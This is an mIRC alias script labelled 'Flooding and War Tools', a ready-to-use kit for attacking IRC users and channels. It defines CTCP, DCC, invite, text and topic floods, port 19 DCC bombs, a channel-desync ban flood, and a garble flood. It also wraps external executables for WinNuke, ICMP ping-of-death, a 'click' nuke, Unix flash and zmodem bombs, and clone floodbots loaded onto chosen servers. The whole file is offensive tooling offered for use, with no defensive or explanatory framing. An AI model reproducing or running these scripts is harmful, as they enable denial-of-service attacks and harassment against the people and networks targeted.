; Flooding and War Tools
;
; Floods
cflood {
  echo %omega 12Now initiating CTCP Clientinfo Flood on  $+ $$1 $+ 
  ignore -ntu120 *!*@*
  timer 30 3 /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo
  timer 1 90 /echo %omega 12CTCP Clientinfo Flood on  $+ $$1 $+  completed
}
eflood {
  echo %omega 12Now initiating CTCP Echo Flood on  $+ $$1 $+ 
  ignore -ntu120 *!*@*
  timer 40 3 /ctcp $$1 echo ‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡
  timer 1 90 /echo %omega 12CTCP Echo Flood on  $+ $$1 $+  completed
}
fflood {
  echo %omega 12Now initiating CTCP Finger Flood on  $+ $$1 $+ 
  ignore -ntu120 *!*@*
  timer 30 3 /ctcp $$1 finger | /ctcp $$1 finger | /ctcp $$1 finger
  timer 1 90 /echo %omega 12CTCP Finger Flood on  $+ $$1 $+  completed
}
pflood {
  echo %omega 12Now initiating CTCP Ping Flood on  $+ $$1 $+ 
  ignore -ntu120 *!*@*
  timer 30 3 /ctcp $$1 ping | /ctcp $$1 ping | /ctcp $$1 ping
  timer 1 90 /echo %omega 12CTCP Ping Flood on  $+ $$1 $+  completed
}
tflood {
  echo %omega 12Now initiating CTCP Time Flood on  $+ $$1 $+ 
  ignore -ntu120 *!*@*
  timer 30 3 /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time
  timer 1 90 /echo %omega 12CTCP Time Flood on  $+ $$1 $+  completed
}
uflood {
  echo %omega 12Now initiating CTCP Userinfo Flood on  $+ $$1 $+ 
  ignore -ntu120 *!*@*
  timer 30 3 /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo
  timer 1 90 /echo %omega 12CTCP Userinfo Flood on  $+ $$1 $+  completed
}
vflood {
  echo %omega 12Now initiating CTCP Version Flood on  $+ $$1 $+ 
  ignore -ntu120 *!*@*
  timer 30 3 /ctcp $$1 version | /ctcp $$1 version | /ctcp $$1 version
  timer 1 90 /echo %omega 12CTCP Version Flood on  $+ $$1 $+  completed
}
chatflood {
  echo %omega 12Now initiating DCC Chat Flood on  $+ $$1 $+ 
  timer 50 2 /raw -q privmsg $$1 : $+ $chr(1) $+ DCC CHAT CHAT $longip($ip) $r(1024,2000) $+ $chr(1)
  timer 1 100 /echo %omega 12DCC Chat Flood on  $+ $$1 $+  completed
}
sendflood {
  echo %omega 12Now initiating DCC Send Flood on  $+ $$1 $+ 
  timer 50 2 /raw -q privmsg $$1 : $+ $chr(1) $+ DCC SEND phear $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ .m00 $longip($ip) $r(1024,2000) $r(2000,7000) $+ $chr(1)
  timer 1 100 /echo %omega 12DCC Send Flood on  $+ $$1 $+  completed
}
dccbomb {
  echo %omega 12Now initiating DCC Bomb Flood on  $+ $$1 $+ 
  timer 30 2 /raw -q privmsg $$1 : $+ $chr(1) $+ DCC CHAT CHAT $longip($ip) $r(1024,2000) $+ $chr(1)
  timer 30 2 /raw -q privmsg $$1 : $+ $chr(1) $+ DCC SEND phear $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ .m00 $longip($ip) $r(1024,2000) $r(2000,7000) $+ $chr(1)
  timer 1 60 /echo %omega 12DCC Bomb Flood on  $+ $$1 $+  completed
}
invflood {
  echo %omega 12Now initiating Invite Flood on  $+ $$1 $+ 
  ignore -ntu120 *!*@*
  timer 30 5 /fakeinv $$1 #‡
  timer 1 180 /echo %omega 12Invite Flood on  $+ $$1 $+  completed
}
textflood {
  echo %omega 12Now initiating Text Flood on  $+ $$1 $+ 
  timer 30 5 /raw -q privmsg $$1 ‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡
  timer 1 180 /echo %omega 12Text Flood on  $+ $$1 $+  completed
}
topflood {
  echo %omega 12Now initiating Topic Flood on  $+ $$1 $+ 
  timer 30 2 /topic $$1 $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9)
  timer 1 90 /echo %omega 12Topic Flood on  $+ $$1 $+  completed
}
portkill {
  echo %omega 12Port 19 Chat Bomb sent to  $+ $$1 $+ 
  raw -q privmsg $$1 :DCC CHAT CHAT 3353362454 19 ?
}
hdfill {
  echo %omega 12Port 19 Hard Drive Fill sent to  $+ $$1 $+ 
  raw -q privmsg $$1 :DCC SEND $$?="Fake Filename" 3353362454 19 ?
}
;
; War Tools
portscan /run $mircdir $+ portscan.exe
udp /run $mircdir $+ udp.exe
icmp {
  if ($2 == $null) {
    run $mircdir $+ ping.exe -t -l $$?="Enter packet size:" -w 1 $?="Enter IP address to ICMP:"
    echo %omega 12Now initiating ICMP Attack on  $+ $! $+ 
  }
  if ($2 != $null) {
    run $mircdir $+ ping.exe -t -l $$1 -w 1 $$2
    echo %omega 12Now initiating ICMP Attack on  $+ $$2 $+ 
  }
}
winnuke {
  if ($1 == $null) {
    run $mircdir $+ wnuke32.exe $?="Enter IP address to crash:"
    echo %omega 12Port 139 WinNuke sent to  $+ $! $+ 
  }
  if ($1 != $null) {
    run $mircdir $+ wnuke32.exe $$1
    echo %omega 12Port 139 WinNuke sent to  $+ $$1 $+ 
  }
}
flash {
  if ($1 == $null) {
    run $mircdir $+ flash.exe $?="Enter user@host to flash:" 1
    echo %omega 12Unix Flash sent to  $+ $! $+ 
  }
  if ($1 != $null) {
    run $mircdir $+ flash.exe $$1 1
    echo %omega 12Unix Flash sent to  $+ $$1 $+ 
  }
}
zmodem {
  if ($1 == $null) {
    run $mircdir $+ flash.exe $?="Enter user@host to send zmodem bomb string to:" 2
    echo %omega 12Unix Zmodem Bomb sent to  $+ $! $+ 
  }
  if ($1 != $null) {
    run $mircdir $+ flash.exe $$1 2
    echo %omega 12Unix Zmodem Bomb sent to  $+ $$1 $+ 
  }
}
killer {
  if ($1 == $null) {
    run $mircdir $+ flash.exe $?="Enter user@host to send flash kill to:" 3
    echo %omega 12Unix Flash Kill sent to  $+ $! $+ 
  }
  if ($1 != $null) {
    run $mircdir $+ flash.exe $$1 3
    echo %omega 12Unix Flash Kill sent to  $+ $$1 $+ 
  }
}
;
; Floodbots
fbtext {
  if ($2 == $null) {
    run $mircdir $+ fb.exe $$?="Enter number of clones to load:" 25 $$?="Enter nick/channel to flood:" 1 $$?="Enter 1st server to load clones onto:" $$?="Enter 2nd server to load clones onto:"
  }
  if ($2 != $null) {
    run $mircdir $+ fb.exe $$1 25 $$2 1 $$?="Enter 1st server to load clones onto:" $$?="Enter 2nd server to load clones onto:"
  }
}
fbfinger {
  if ($2 == $null) {
    run $mircdir $+ fb.exe $$?="Enter number of clones to load:" 25 $$?="Enter nick/channel to flood:" 2 $$?="Enter 1st server to load clones onto:" $$?="Enter 2nd server to load clones onto:"
  }
  if ($2 != $null) {
    run $mircdir $+ fb.exe $$1 25 $$2 2 $$?="Enter 1st server to load clones onto:" $$?="Enter 2nd server to load clones onto:"
  }
}
fbping {
  if ($2 == $null) {
    run $mircdir $+ fb.exe $$?="Enter number of clones to load:" 25 $$?="Enter nick/channel to flood:" 3 $$?="Enter 1st server to load clones onto:" $$?="Enter 2nd server to load clones onto:"
  }
  if ($2 != $null) {
    run $mircdir $+ fb.exe $$1 25 $$2 3 $$?="Enter 1st server to load clones onto:" $$?="Enter 2nd server to load clones onto:"
  }
}
fbsed {
  if ($2 == $null) {
    run $mircdir $+ fb.exe $$?="Enter number of clones to load:" 25 $$?="Enter nick/channel to flood:" 4 $$?="Enter 1st server to load clones onto:" $$?="Enter 2nd server to load clones onto:"
  }
  if ($2 != $null) {
    run $mircdir $+ fb.exe $$1 25 $$2 4 $$?="Enter 1st server to load clones onto:" $$?="Enter 2nd server to load clones onto:"
  }
}
fbbotkill {
  if ($2 == $null) {
    run $mircdir $+ fb.exe $$?="Enter number of clones to load:" 25 $$?="Enter nick/channel to flood:" 5 $$?="Enter 1st server to load clones onto:" $$?="Enter 2nd server to load clones onto:"
  }
  if ($2 != $null) {
    run $mircdir $+ fb.exe $$1 25 $$2 5 $$?="Enter 1st server to load clones onto:" $$?="Enter 2nd server to load clones onto:"
  }
}
fbecho {
  if ($2 == $null) {
    run $mircdir $+ fb.exe $$?="Enter number of clones to load:" 25 $$?="Enter nick/channel to flood:" 6 $$?="Enter 1st server to load clones onto:" $$?="Enter 2nd server to load clones onto:"
  }
  if ($2 != $null) {
    run $mircdir $+ fb.exe $$1 25 $$2 6 $$?="Enter 1st server to load clones onto:" $$?="Enter 2nd server to load clones onto:"
  }
}
fbblitz {
  if ($2 == $null) {
    run $mircdir $+ fb.exe $$?="Enter number of clones to load:" 25 $$?="Enter nick/channel to flood:" 7 $$?="Enter 1st server to load clones onto:" $$?="Enter 2nd server to load clones onto:"
  }
  if ($2 != $null) {
    run $mircdir $+ fb.exe $$1 25 $$2 7 $$?="Enter 1st server to load clones onto:" $$?="Enter 2nd server to load clones onto:"
  }
}
fbversion {
  if ($2 == $null) {
    run $mircdir $+ fb.exe $$?="Enter number of clones to load:" 25 $$?="Enter nick/channel to flood:" 8 $$?="Enter 1st server to load clones onto:" $$?="Enter 2nd server to load clones onto:"
  }
  if ($2 != $null) {
    run $mircdir $+ fb.exe $$1 25 $$2 8 $$?="Enter 1st server to load clones onto:" $$?="Enter 2nd server to load clones onto:"
  }
}
;
; Desync
desync {
  mode # +bbbb *!*@*A* *!*@*B* *!*@*C* *!*@*D*
  mode # +bbbb *!*@*E* *!*@*F* *!*@*G* *!*@*H*
  mode # +bbbb *!*@*I* *!*@*J* *!*@*K* *!*@*L*
  mode # +bbbb *!*@*M* *!*@*N* *!*@*O* *!*@*P*
  mode # +bbbb *!*@*Q* *!*@*R* *!*@*S* *!*@*T*
  mode # +bbbb *!*@*U* *!*@*V* *!*@*W* *!*@*X*
  mode # +bbbb *!*@*Y* *!*@*Z* *!*@*1* *!*@*2*
  mode # +bbbb *!*@*3* *!*@*4* *!*@*5* *!*@*6*
  mode # +bbbb *!*@*7* *!*@*8* *!*@*9* *!*@*0*
  mode # +smtinlkb -50000 <-O->Omega<-O-> *!*@*
}
[aliases]
n0=; Flooding and War Tools
n1=;
n2=; Floods
n3=chatflood {
n4=  echo %symbol 14DCC Chat Flood sent to 14 $+ $$1 $+ 
n5=  set %nukemsg %symbol-nocolor DCC Chat Flood sent to  $+ $$1 $+ 
n6=  .timer 50 2 /raw -q privmsg $$1 : $+ $chr(1) $+ DCC CHAT CHAT $longip($ip) $r(1024,2000) $+ $chr(1)
n7=}
n8=sendflood {
n9=  echo %symbol 14DCC Send Flood sent to 14 $+ $$1 $+ 
n10=  set %nukemsg %symbol-nocolor DCC Send Flood sent to  $+ $$1 $+ 
n11=  .timer 50 2 /raw -q privmsg $$1 : $+ $chr(1) $+ DCC SEND phear $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ .m00 $longip($ip) $r(1024,2000) $r(2000,7000) $+ $chr(1)
n12=}
n13=dccbomb {
n14=  echo %symbol 14DCC Chat/Send Bomb sent to 14 $+ $$1 $+ 
n15=  set %nukemsg %symbol-nocolor DCC Chat/Send Flood sent to  $+ $$1 $+ 
n16=  .timer 30 2 /raw -q privmsg $$1 : $+ $chr(1) $+ DCC CHAT CHAT $longip($ip) $r(1024,2000) $+ $chr(1)
n17=  .timer 30 2 /raw -q privmsg $$1 : $+ $chr(1) $+ DCC SEND phear $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ .m00 $longip($ip) $r(1024,2000) $r(2000,7000) $+ $chr(1)
n18=}
n19=;
n20=; Port 19
n21=19chat {
n22=  echo %symbol 14Port 19 DCC Chat Bomb sent to 14 $+ $$1 $+ 
n23=  set %nukemsg %symbol-nocolor Port 19 DCC Chat Bomb sent to  $+ $$1 $+ 
n24=  raw -q privmsg $$1 :DCC CHAT CHAT 3353362454 19 ?
n25=}
n26=19send {
n27=  echo %symbol 14Port 19 DCC Send Bomb sent to 14 $+ $$1 $+ 
n28=  set %nukemsg %symbol-nocolor Port 19 DCC Send Bomb sent to  $+ $$1 $+ 
n29=  raw -q privmsg $$1 :DCC SEND $$?="Fake Filename" 3353362454 19 ?
n30=}
n31=;
n32=; War Tools
n33=p1ng {
n34=  if ($1 == $null) {
n35=    set %nukenick $?="Enter nick to ICMP:"
n36=    set %packetsize $?="Enter packet size:"
n37=    goto fin
n38=  }
n39=  if ($1 != $null) {
n40=    set %nukenick $$1
n41=    if ($2 == $null) {
n42=      set %packetsize $?="Enter packet size:"
n43=      goto fin
n44=    }
n45=    if ($2 != $null) {
n46=      set %packetsize $$2
n47=      goto fin
n48=    }
n49=    :fin
n50=    whois %nukenick
n51=    .enable #nuke
n52=    .timer 1 5 /ping-o-death
n53=  }
n54=}
n55=ping-o-death {
n56=  run $mircdir $+ ping.exe -t -l %packetsize -w 1 %nuke
n57=  echo %symbol 14ICMP Ping-O-Death Attack sent to 14 $+ %nukenick $+  ( $+ %nuke $+ )
n58=  set %nukemsg %symbol-nocolor ICMP Ping-O-Death Attack sent to  $+ %nukenick $+  ( $+ %nuke $+ )
n59=  .disable #nuke
n60=  halt
n61=}
n62=winnuke {
n63=  if ($1 == $null) {
n64=    set %nukenick $?="Enter nick to WinNuke:"
n65=  }
n66=  if ($1 != $null) {
n67=    set %nukenick $$1
n68=  }
n69=  whois %nukenick
n70=  .enable #nuke
n71=  .timer 1 5 /wnuke
n72=}
n73=wnuke {
n74=  run $mircdir $+ winnuke.exe %nuke
n75=  echo %symbol 14Port 139 WinNuke sent to 14 $+ %nukenick $+  ( $+ %nuke $+ )
n76=  set %nukemsg %symbol-nocolor Port 139 WinNuke sent to  $+ %nukenick $+  ( $+ %nuke $+ )
n77=  .disable #nuke
n78=  halt
n79=}
n80=;
n81=unreach {
n82=  if ($1 == $null) {
n83=    set %nukenick $?="Enter nick to nuke:"
n84=    set %lastport $?="Enter highest client port to nuke (1024>65535)
n85=    goto fin
n86=  }
n87=  if ($1 != $null) {
n88=    set %nukenick $$1
n89=    if ($2 == $null) {
n90=      set %lastport $?="Enter highest client port to nuke (1024>65535)
n91=      goto fin
n92=    }
n93=    if ($2 != $null) {
n94=      set %lastport $$2
n95=      goto fin
n96=    }
n97=    :fin
n98=    whois %nukenick
n99=    .enable #click
n100=    .timer 1 5 /click
n101=  }
n102=}
n103=click {
n104=  run $mircdir $+ click.exe %floodserv1 %nuke -clp 1024 -chp %lastport -sp 6660-6669,7000,7777
n105=  echo %symbol 14Click Nuke sent to 14 $+ %nukenick $+  ( $+ %nuke $+ )
n106=  set %nukemsg %symbol-nocolor Click Nuke sent to  $+ %nukenick $+  ( $+ %nuke $+ )
n107=  .disable #click
n108=  halt
n109=}
n110=;
n111=/udp /run $mircdir $+ udp.exe
n112=;
n113=flash {
n114=  if ($1 == $null) {
n115=    set %nukenick $?="Enter nick to flash:"
n116=  }
n117=  if ($1 != $null) {
n118=    set %nukenick $$1
n119=  }
n120=  set %flash Unix Flash Attack
n121=  set %flashtype 1
n122=  whois %nukenick
n123=  .enable #flash
n124=  .timer 1 5 /flashattack
n125=}
n126=zmodem {
n127=  if ($1 == $null) {
n128=    set %nukenick $?="Enter nick to flash:"
n129=  }
n130=  if ($1 != $null) {
n131=    set %nukenick $$1
n132=  }
n133=  set %flash Unix Zmodem Bomb
n134=  set %flashtype 2
n135=  whois %nukenick
n136=  .enable #flash
n137=  .timer 1 5 /flashattack
n138=}
n139=killer {
n140=  if ($1 == $null) {
n141=    set %nukenick $?="Enter nick to flash:"
n142=  }
n143=  if ($1 != $null) {
n144=    set %nukenick $$1
n145=  }
n146=  set %flash Unix Flash Kill
n147=  set %flashtype 3
n148=  whois %nukenick
n149=  .enable #flash
n150=  .timer 1 5 /flashattack
n151=}
n152=flashattack {
n153=  run $mircdir $+ flash.exe %nuke %flashtype
n154=  echo %symbol 14 $+ %flash $+  sent to 14 $+ %nukenick $+  ( $+ %nuke $+ )
n155=  set %nukemsg %symbol-nocolor  $+ %flash $+  sent to  $+ %nukenick $+  ( $+ %nuke $+ )
n156=  .disable #flash
n157=  halt
n158=}
n159=;
n160=; Floodbots
n161=fbtext {
n162=  if ($1 == $null) {
n163=    set %nukenick $?="Enter nick/channel to flood:"
n164=  }
n165=  if ($1 != $null) {
n166=    set %nukenick $$1
n167=  }
n168=  set %bottype 1
n169=  set %floodtype Text
n170=  floodbot
n171=}
n172=fbfinger {
n173=  if ($1 == $null) {
n174=    set %nukenick $?="Enter nick/channel to flood:"
n175=  }
n176=  if ($1 != $null) {
n177=    set %nukenick $$1
n178=  }
n179=  set %bottype 2
n180=  set %floodtype Finger
n181=  floodbot
n182=}
n183=fbping {
n184=  if ($1 == $null) {
n185=    set %nukenick $?="Enter nick/channel to flood:"
n186=  }
n187=  if ($1 != $null) {
n188=    set %nukenick $$1
n189=  }
n190=  set %bottype 3
n191=  set %floodtype Ping
n192=  floodbot
n193=}
n194=fbsed {
n195=  if ($1 == $null) {
n196=    set %nukenick $?="Enter nick/channel to flood:"
n197=  }
n198=  if ($1 != $null) {
n199=    set %nukenick $$1
n200=  }
n201=  set %bottype 4
n202=  set %floodtype SED
n203=  floodbot
n204=}
n205=fbbotkiller {
n206=  if ($1 == $null) {
n207=    set %nukenick $?="Enter nick/channel to flood:"
n208=  }
n209=  if ($1 != $null) {
n210=    set %nukenick $$1
n211=  }
n212=  set %bottype 5
n213=  set %floodtype Botkiller
n214=  floodbot
n215=}
n216=fbecho {
n217=  if ($1 == $null) {
n218=    set %nukenick $?="Enter nick/channel to flood:"
n219=  }
n220=  if ($1 != $null) {
n221=    set %nukenick $$1
n222=  }
n223=  set %bottype 6
n224=  set %floodtype Echo
n225=  floodbot
n226=}
n227=fbblitz {
n228=  if ($1 == $null) {
n229=    set %nukenick $?="Enter nick/channel to flood:"
n230=  }
n231=  if ($1 != $null) {
n232=    set %nukenick $$1
n233=  }
n234=  set %bottype 7
n235=  set %floodtype Blitz
n236=  floodbot
n237=}
n238=fbversion {
n239=  if ($1 == $null) {
n240=    set %nukenick $?="Enter nick/channel to flood:"
n241=  }
n242=  if ($1 != $null) {
n243=    set %nukenick $$1
n244=  }
n245=  set %bottype 8
n246=  set %floodtype Version
n247=  floodbot
n248=}
n249=floodbot {
n250=  run $mircdir $+ fb.exe %floodbots 25 %nukenick %bottype %floodserv1 %floodserv2
n251=  echo %symbol 14 $+ %floodtype Flood sent to 14 $+ %nukenick $+ 
n252=  set %nukemsg %symbol-nocolor  $+ %floodtype Flood sent to  $+ %nukenick $+ 
n253=}
n254=;
n255=; Garble Flood
n256=garble {
n257=  say  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+  $+ $$1 $+ 
n258=}
n259=/nukemsg /say %nukemsg
n260=;
n261=; Setup/Stats
n262=warsetup {
n263=  set %floodbots $?="Enter default number of floodboots to load:"
n264=  set %floodserv1 $?="Enter primary IRC server to load bots onto:"
n265=  set %floodserv2 $?="Enter secondary IRC server to load bots onto:"
n266=  echo %symbol 14War Setup
n267=  echo %symbol 14Default number of floodbots to load: %floodbots
n268=  echo %symbol 14Primary flood server: %floodserv1
n269=  echo %symbol 14Secondary flood server: %floodserv2
n270=}
n271=warstats {
n272=  echo %symbol 14War Stats
n273=  echo %symbol 14Default number of floodbots to load: %floodbots
n274=  echo %symbol 14Primary flood server: %floodserv1
n275=  echo %symbol 14Secondary flood server: %floodserv2
n276=}
